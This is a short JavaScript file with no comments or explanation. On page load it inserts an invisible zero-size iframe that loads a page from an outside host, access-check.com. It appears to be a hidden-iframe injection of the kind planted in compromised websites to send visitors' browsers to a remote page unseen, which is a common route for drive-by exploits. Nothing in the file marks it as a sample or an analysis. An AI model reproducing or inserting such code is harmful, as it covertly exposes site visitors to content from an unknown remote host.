
var iframedoc;
function onLoad() {
var iframe = document.createElement("iframe");
iframe.style.border='0px';
iframe.style.width='0px';
iframe.style.height='0px';
document.getElementById("1").appendChild(iframe);
if (document.all) {
iframedoc = iframe.contentWindow.document;
} else {
iframedoc = iframe.contentDocument;
}
iframedoc.location.href = "http://www.access-check.com/monv5/1.html";
}
window.onload = onLoad;
;
;
;

